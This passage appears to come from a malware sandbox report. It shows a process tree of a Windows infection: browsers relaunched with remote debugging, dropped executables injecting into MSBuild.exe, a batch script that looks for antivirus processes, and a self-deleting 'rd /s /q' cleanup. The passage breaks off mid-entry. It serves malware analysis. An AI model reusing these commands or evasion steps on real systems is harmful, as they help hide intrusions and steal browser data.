                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                                                        10⤵
                                                                        • Uses browser remote debugging
                                                                        • Checks processor information in registry
                                                                        • Enumerates system info in registry
                                                                        • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                                                        • Suspicious use of FindShellTrayWindow
                                                                        PID:5768
                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x244,0x248,0x24c,0x240,0x21c,0x7ffd5a51f208,0x7ffd5a51f214,0x7ffd5a51f220
                                                                          11⤵
                                                                            PID:3052
                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1780,i,8504107133955145536,17905294650934920070,262144 --variations-seed-version --mojo-platform-channel-handle=2060 /prefetch:3
                                                                            11⤵
                                                                              PID:1920
                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2028,i,8504107133955145536,17905294650934920070,262144 --variations-seed-version --mojo-platform-channel-handle=2024 /prefetch:2
                                                                              11⤵
                                                                                PID:1508
                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2532,i,8504107133955145536,17905294650934920070,262144 --variations-seed-version --mojo-platform-channel-handle=2684 /prefetch:8
                                                                                11⤵
                                                                                  PID:2736
                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --pdf-upsell-enabled --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3448,i,8504107133955145536,17905294650934920070,262144 --variations-seed-version --mojo-platform-channel-handle=3528 /prefetch:1
                                                                                  11⤵
                                                                                  • Uses browser remote debugging
                                                                                  PID:5568
                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3440,i,8504107133955145536,17905294650934920070,262144 --variations-seed-version --mojo-platform-channel-handle=3520 /prefetch:1
                                                                                  11⤵
                                                                                  • Uses browser remote debugging
                                                                                  PID:1652
                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5388,i,8504107133955145536,17905294650934920070,262144 --variations-seed-version --mojo-platform-channel-handle=5460 /prefetch:8
                                                                                  11⤵
                                                                                    PID:5832
                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5404,i,8504107133955145536,17905294650934920070,262144 --variations-seed-version --mojo-platform-channel-handle=5436 /prefetch:8
                                                                                    11⤵
                                                                                      PID:1564
                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=PooledProcess2 --lang=en-US --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5832,i,8504107133955145536,17905294650934920070,262144 --variations-seed-version --mojo-platform-channel-handle=5860 /prefetch:8
                                                                                      11⤵
                                                                                        PID:5812
                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                                                                      10⤵
                                                                                      • Uses browser remote debugging
                                                                                      PID:3076
                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                                                                      10⤵
                                                                                      • Uses browser remote debugging
                                                                                      • Enumerates system info in registry
                                                                                      • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                                                                      • Suspicious use of FindShellTrayWindow
                                                                                      PID:2372
                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x23c,0x240,0x244,0x238,0x2f4,0x7ffd5a51f208,0x7ffd5a51f214,0x7ffd5a51f220
                                                                                        11⤵
                                                                                          PID:2236
                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1880,i,3974105501104375449,10604412946354196170,262144 --variations-seed-version --mojo-platform-channel-handle=2528 /prefetch:3
                                                                                          11⤵
                                                                                            PID:4592
                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2500,i,3974105501104375449,10604412946354196170,262144 --variations-seed-version --mojo-platform-channel-handle=2492 /prefetch:2
                                                                                            11⤵
                                                                                              PID:2832
                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2136,i,3974105501104375449,10604412946354196170,262144 --variations-seed-version --mojo-platform-channel-handle=2808 /prefetch:8
                                                                                              11⤵
                                                                                                PID:3128
                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3496,i,3974105501104375449,10604412946354196170,262144 --variations-seed-version --mojo-platform-channel-handle=3524 /prefetch:1
                                                                                                11⤵
                                                                                                • Uses browser remote debugging
                                                                                                PID:2668
                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --pdf-upsell-enabled --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3500,i,3974105501104375449,10604412946354196170,262144 --variations-seed-version --mojo-platform-channel-handle=3536 /prefetch:1
                                                                                                11⤵
                                                                                                • Uses browser remote debugging
                                                                                                PID:1716
                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4116,i,3974105501104375449,10604412946354196170,262144 --variations-seed-version --mojo-platform-channel-handle=5116 /prefetch:8
                                                                                                11⤵
                                                                                                  PID:5272
                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4840,i,3974105501104375449,10604412946354196170,262144 --variations-seed-version --mojo-platform-channel-handle=5124 /prefetch:8
                                                                                                  11⤵
                                                                                                    PID:1080
                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=PooledProcess2 --lang=en-US --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5484,i,3974105501104375449,10604412946354196170,262144 --variations-seed-version --mojo-platform-channel-handle=5492 /prefetch:8
                                                                                                    11⤵
                                                                                                      PID:1224
                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4204,i,3974105501104375449,10604412946354196170,262144 --variations-seed-version --mojo-platform-channel-handle=2696 /prefetch:8
                                                                                                      11⤵
                                                                                                        PID:5588
                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                                                                                      10⤵
                                                                                                      • Uses browser remote debugging
                                                                                                      PID:6412
                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x23c,0x240,0x244,0x238,0x2b8,0x7ffd5a51f208,0x7ffd5a51f214,0x7ffd5a51f220
                                                                                                        11⤵
                                                                                                          PID:5560
                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1904,i,2391294570805351121,11839459589128454801,262144 --variations-seed-version --mojo-platform-channel-handle=2184 /prefetch:3
                                                                                                          11⤵
                                                                                                            PID:5024
                                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2148,i,2391294570805351121,11839459589128454801,262144 --variations-seed-version --mojo-platform-channel-handle=2144 /prefetch:2
                                                                                                            11⤵
                                                                                                              PID:6808
                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2528,i,2391294570805351121,11839459589128454801,262144 --variations-seed-version --mojo-platform-channel-handle=2536 /prefetch:8
                                                                                                              11⤵
                                                                                                                PID:1180
                                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3464,i,2391294570805351121,11839459589128454801,262144 --variations-seed-version --mojo-platform-channel-handle=3548 /prefetch:1
                                                                                                                11⤵
                                                                                                                • Uses browser remote debugging
                                                                                                                PID:6616
                                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3472,i,2391294570805351121,11839459589128454801,262144 --variations-seed-version --mojo-platform-channel-handle=3552 /prefetch:1
                                                                                                                11⤵
                                                                                                                • Uses browser remote debugging
                                                                                                                PID:224
                                                                                                            • C:\ProgramData\5fus0r1v3e.exe
                                                                                                              "C:\ProgramData\5fus0r1v3e.exe"
                                                                                                              10⤵
                                                                                                                PID:3164
                                                                                                                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                                                  11⤵
                                                                                                                    PID:6848
                                                                                                                • C:\ProgramData\djmo8g4ect.exe
                                                                                                                  "C:\ProgramData\djmo8g4ect.exe"
                                                                                                                  10⤵
                                                                                                                    PID:1612
                                                                                                                    • C:\ProgramData\djmo8g4ect.exe
                                                                                                                      "C:\ProgramData\djmo8g4ect.exe"
                                                                                                                      11⤵
                                                                                                                        PID:4772
                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe"
                                                                                                                          12⤵
                                                                                                                            PID:2228
                                                                                                                          • C:\Users\Admin\AppData\Local\Fw5n6iabAyK9.exe
                                                                                                                            "C:\Users\Admin\AppData\Local\Fw5n6iabAyK9.exe"
                                                                                                                            12⤵
                                                                                                                              PID:14532
                                                                                                                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                                                                13⤵
                                                                                                                                  PID:14348
                                                                                                                              • C:\Users\Admin\AppData\Local\ELXuE13IRrmf.exe
                                                                                                                                "C:\Users\Admin\AppData\Local\ELXuE13IRrmf.exe"
                                                                                                                                12⤵
                                                                                                                                  PID:13376
                                                                                                                                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                                                                    13⤵
                                                                                                                                      PID:14424
                                                                                                                                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                                                                      13⤵
                                                                                                                                        PID:14060
                                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                                                                                                                          14⤵
                                                                                                                                          • Uses browser remote debugging
                                                                                                                                          PID:31720
                                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0x114,0x118,0x11c,0xf0,0x120,0x7ffd6a40dcf8,0x7ffd6a40dd04,0x7ffd6a40dd10
                                                                                                                                            15⤵
                                                                                                                                              PID:37552
                                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=1992,i,10017349146577293688,5844059339991061305,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=1988 /prefetch:2
                                                                                                                                              15⤵
                                                                                                                                                PID:37368
                                                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1568,i,10017349146577293688,5844059339991061305,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=2144 /prefetch:3
                                                                                                                                                15⤵
                                                                                                                                                  PID:37352
                                                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2212,i,10017349146577293688,5844059339991061305,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=2880 /prefetch:8
                                                                                                                                                  15⤵
                                                                                                                                                    PID:37272
                                                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3244,i,10017349146577293688,5844059339991061305,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=3256 /prefetch:1
                                                                                                                                                    15⤵
                                                                                                                                                    • Uses browser remote debugging
                                                                                                                                                    PID:37176
                                                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3260,i,10017349146577293688,5844059339991061305,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=3292 /prefetch:1
                                                                                                                                                    15⤵
                                                                                                                                                    • Uses browser remote debugging
                                                                                                                                                    PID:37168
                                                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4200,i,10017349146577293688,5844059339991061305,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=4236 /prefetch:2
                                                                                                                                                    15⤵
                                                                                                                                                    • Uses browser remote debugging
                                                                                                                                                    PID:37072
                                                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4664,i,10017349146577293688,5844059339991061305,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=4672 /prefetch:1
                                                                                                                                                    15⤵
                                                                                                                                                    • Uses browser remote debugging
                                                                                                                                                    PID:31356
                                                                                                                                            • C:\Users\Admin\AppData\Local\XsIwnDdoi9yl.exe
                                                                                                                                              "C:\Users\Admin\AppData\Local\XsIwnDdoi9yl.exe"
                                                                                                                                              12⤵
                                                                                                                                                PID:18964
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\SXaYE2r5\41XUtFYpupHffPs3.exe
                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\SXaYE2r5\41XUtFYpupHffPs3.exe 0
                                                                                                                                                  13⤵
                                                                                                                                                    PID:19060
                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\SXaYE2r5\cLslmErBPYyTEtXb.exe
                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\SXaYE2r5\cLslmErBPYyTEtXb.exe 19060
                                                                                                                                                      14⤵
                                                                                                                                                        PID:24932
                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 24932 -s 572
                                                                                                                                                          15⤵
                                                                                                                                                          • Program crash
                                                                                                                                                          PID:31360
                                                                                                                                              • C:\ProgramData\cjwbaas0hv.exe
                                                                                                                                                "C:\ProgramData\cjwbaas0hv.exe"
                                                                                                                                                10⤵
                                                                                                                                                  PID:5308
                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\1Em4pQdp\ZaoGrJHNl4a2KMlU.exe
                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\1Em4pQdp\ZaoGrJHNl4a2KMlU.exe 0
                                                                                                                                                    11⤵
                                                                                                                                                      PID:4596
                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\1Em4pQdp\FkkkemdfH8bLOHpz.exe
                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\1Em4pQdp\FkkkemdfH8bLOHpz.exe 4596
                                                                                                                                                        12⤵
                                                                                                                                                          PID:2936
                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 2936 -s 1596
                                                                                                                                                            13⤵
                                                                                                                                                            • Program crash
                                                                                                                                                            PID:19192
                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 4596 -s 972
                                                                                                                                                          12⤵
                                                                                                                                                          • Program crash
                                                                                                                                                          PID:30008
                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                      "C:\Windows\system32\cmd.exe" /c timeout /t 11 & rd /s /q "C:\ProgramData\i5x4o" & exit
                                                                                                                                                      10⤵
                                                                                                                                                        PID:16068
                                                                                                                                                        • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                          timeout /t 11
                                                                                                                                                          11⤵
                                                                                                                                                          • Delays execution with timeout.exe
                                                                                                                                                          PID:16140
                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\10028410101\alex12312321.exe
                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\10028410101\alex12312321.exe"
                                                                                                                                                    8⤵
                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                                                    PID:3488
                                                                                                                                                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                                                                                      9⤵
                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                      PID:4944
                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\10045380101\legendarik.exe
                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\10045380101\legendarik.exe"
                                                                                                                                                    8⤵
                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                                                    PID:3468
                                                                                                                                                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                                                                                      9⤵
                                                                                                                                                        PID:4908
                                                                                                                                                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                                                                                        9⤵
                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                        PID:2448
                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\10046340101\9b5f01d4a1.exe
                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\10046340101\9b5f01d4a1.exe"
                                                                                                                                                      8⤵
                                                                                                                                                      • Checks computer location settings
                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                      • Drops file in Windows directory
                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                      PID:2376
                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                        "C:\Windows\System32\cmd.exe" /c copy Bc.wbk Bc.wbk.bat & Bc.wbk.bat
                                                                                                                                                        9⤵
                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                        PID:1832
                                                                                                                                                        • C:\Windows\SysWOW64\tasklist.exe
                                                                                                                                                          tasklist
                                                                                                                                                          10⤵
                                                                                                                                                          • Enumerates processes with tasklist
                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                          PID:2480
                                                                                                                                                        • C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                          findstr /I "opssvc wrsa"
                                                                                                                                                          10⤵
                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                          PID:2204
                                                                                                                                                        • C:\Windows\SysWOW64\tasklist.exe
                                                                                                                                                          tasklist
                                                                                                                                                          10⤵
                                                                                                                                                          • Enumerates processes with tasklist
                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                          PID:2416
                                                                                                                                                        • C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                          findstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"
                                                                                                                                                          10⤵
                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                          PID:3012
                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                          cmd /c md 674187
                                                                                                                                                          10⤵
                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                          PID:2728
                                                                                                                                                        • C:\Windows\SysWOW64\extrac32.exe
